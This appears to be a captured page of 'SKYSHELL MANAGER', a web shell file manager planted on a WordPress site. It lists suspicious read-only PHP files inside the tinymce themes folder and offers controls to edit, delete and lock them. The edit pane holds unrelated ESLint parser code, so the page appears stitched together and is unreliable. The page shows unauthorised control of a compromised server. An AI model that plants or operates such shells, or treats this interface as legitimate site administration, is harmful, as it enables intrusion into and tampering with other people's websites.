📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: index.cjs
const { normalizeESLintConfig } = require("./configuration.cjs"); const analyzeScope = require("./analyze-scope.cjs"); const baseParse = require("./parse.cjs"); const { LocalClient, WorkerClient } = require("./client.cjs"); const client = new LocalClient(); exports.parse = function (code, options = {}) { return baseParse(code, normalizeESLintConfig(options), client); }; exports.parseForESLint = function (code, options = {}) { const normalizedOptions = normalizeESLintConfig(options); const ast = baseParse(code, normalizedOptions, client); const scopeManager = analyzeScope(ast, normalizedOptions, client); return { ast, scopeManager, visitorKeys: client.getVisitorKeys() }; }; //# sourceMappingURL=index.cjs.map
Save